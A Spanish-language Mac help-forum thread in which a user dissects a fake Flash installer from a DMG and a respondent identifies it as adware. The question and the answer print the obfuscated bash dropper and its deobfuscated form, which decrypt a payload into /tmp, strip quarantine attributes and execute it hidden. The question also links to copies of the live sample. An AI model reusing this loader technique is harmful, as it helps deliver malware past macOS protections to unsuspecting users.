5 votos

David TG avatar

¿Posiblemente un virus?

Preguntado el 10 de Octubre, 2021
Cuando se hizo la pregunta
251 visitas
Cuantas visitas ha tenido la pregunta
1 Respuestas
Cuantas respuestas ha tenido la pregunta
Abierta
Estado actual de la pregunta

Soy nuevo en Mac. Descargué un software de un sitio web. Era un archivo DMG. Lo instalé, pero luego la aplicación no apareció en el Launchpad. He accedido al DMG y veo este extraño script que podría ser un virus (¿por qué cifrar los argumentos??) ¿Qué pensáis? ¿Dónde puedo encontrar la aplicación instalada y eliminarla?

Busqué en Acerca de este Mac > Informe del sistema > Instalaciones & Aplicaciones pero no está ahí. Y luego he utilizado la búsqueda en el Finder y tampoco.

EDIT: El software que traté de descargar era un software legítimo de alrededor de 115MB y cuando lo descargué sólo tenía 4MB... esa fue mi primera bandera roja. Luego ejecuto la instalación, y en lugar del logo del software, decía que estaba instalando flash... y luego se mostraba una terminal y se ocultaba en un segundo... Abrí el archivo de instalación y tengo esto:

#!/bin/bash
G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX18mEBVdMEhSyNthIprtcEexqgmiVNi7GYZhMTp6b/5TLfySc6T7DDx4s/IhTc8GJ2IjrqeWRIb8Rv9r8FqrZplCOhnKlqwMSumhQ5K47p1GzR7WEpWxL2cdbMPuQDuntt9UqqoIuDsJrH5S2rkk8gbKu6+XIMA8rtTe1XzG/yjQXOWDzF6YzLyuy4Mf9Ro26V9NWalR+VmHaX6V0Mdpy9Gw/01HB93qNTV3VuzwYNBxInWHSgeJ4lMOYmg2YjmF6ihs4fA8cdJk0qoKKh87gzad3PoFiBKRmMIfqtwC/BBZ+F+GP2fIAav3'
decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"
nohup /bin/bash -c "${H}v${G}${V} \"$decryptedFommand\"" >/dev/null 2>&1 &
killall Terminal

Lo cual es bastante extraño... ¿por qué una instalación cifraría sus parámetros?

Así que según esto, he creado un nuevo bash script con esto:

#!/bin/bash
G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX18mEBVdMEhSyNthIprtcEexqgmiVNi7GYZhMTp6b/5TLfySc6T7DDx4s/IhTc8GJ2IjrqeWRIb8Rv9r8FqrZplCOhnKlqwMSumhQ5K47p1GzR7WEpWxL2cdbMPuQDuntt9UqqoIuDsJrH5S2rkk8gbKu6+XIMA8rtTe1XzG/yjQXOWDzF6YzLyuy4Mf9Ro26V9NWalR+VmHaX6V0Mdpy9Gw/01HB93qNTV3VuzwYNBxInWHSgeJ4lMOYmg2YjmF6ihs4fA8cdJk0qoKKh87gzad3PoFiBKRmMIfqtwC/BBZ+F+GP2fIAav3'
decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"

Y traté primero de hacer eco de commandArgs y luego de decryptedFommand pero en ambos casos obtuve:

4379344364:error:06FFF064:digital envelope rutinas:CRYPTO_internas:mal decrypt:/System/Volumes/Data/SWE/MacOS/BuildRoots/38cf1d983f/Library/Caches/com.apple.xbs/Sources/libressl/libressl-56.60.2/libressl-2.8/crypto/evp/evp_enc.c:521:

Según los comentarios de @nohillside había otro archivo que tenía la clave del cifrado. Así que cogí ese archivo y lo puse en la misma carpeta que el script. Pero también usaba su propio nombre, así que tuve que renombrarlo para que coincidiera con el script original, que era Install.command. Y con eso, pude conseguir que decryptedFomand huellas:

$(echo "openssl enc -aes-256-cbc -d -A -base64 -k \"$archive\" -in \"$appDir/$archive\" -out \"$tmpDir/$binFile\"; xattr -c \"$tmpDir/\"*; chmod 777 \"$tmpDir/$binFile\"; \"$tmpDir/$binFile\" && rm -rf $tmpDir")

Y luego utiliza eso para ejecutar el último comando:

nohup /bin/bash -c "${H}v${G}${V} \"$decryptedFommand\"" >/dev/null 2>&1 &
killall Terminal

¿Y qué hace?

He subido el DMG sospechoso a mi Google Drive por si sirve de ayuda: https://drive.google.com/file/d/1O2WihwZyzjzUZVwLkAfmCw8nqXYZeG96/view?usp=sharing En caso de no poder descargar el DMG, pongo un archivo zip con ambos archivos (instalador y el archivo de la llave): https://drive.google.com/file/d/1YDccdiWZsgNMcqvGPmuiatJfBnfns5lE/view?usp=sharing

Preguntado el 10 de Octubre, 2021 por David TG

Respuesta

¿Demasiados anuncios?

3voto

naveenkrdy avatar
naveenkrdy Puntos 1

Es un adware. https://www.virustotal.com/gui/file/539b344bda35eaf41d043cdfc76b92bb8117edfbd3d7bf546e28c173064affc9/detection

Hoy me he encontrado con esto. Así que lo he analizado.

-rw-r--r-- 1 230360 Dec 17 03:49 3Mj2Qk7tMC8
-rwxrwxrwx 1    994 Dec 17 03:49 Install.command

El primer archivo es la clave y la carga útil propiamente dicha, que está cifrada.

Y el segundo archivo, que contiene el código ofuscado. Descifra el payload en el directorio /tmp y lo ejecuta.

código que fue ofuscado:

$([[ $(uname -p) == arm ]] && (echo A | softwareupdate --install-rosetta); 
  echo "openssl enc -aes-256-cbc -d -A -base64 -k \"$archive\" -in \"$appDir/$archive\" -out \"$tmpDir/$binFile\"; xattr -c \"$tmpDir/\"*; chmod 777 \"$tmpDir/$binFile\"; \"$tmpDir/$binFile\" && rm -rf $tmpDir")
Respondido el 9 de Marzo, 2022 por naveenkrdy (1 Puntos )

Preguntas relacionadas

Preguntas Destacadas

Etiquetas mas usadas

En nuestra red

AppleAyuda.com

AppleAyuda es una comunidad de usuarios de los productos de Apple en la que puedes resolver tus problemas y dudas.
Puedes consultar las preguntas de otros usuarios, hacer tus propias preguntas o resolver las de los demás.

Powered by:

Yandex
X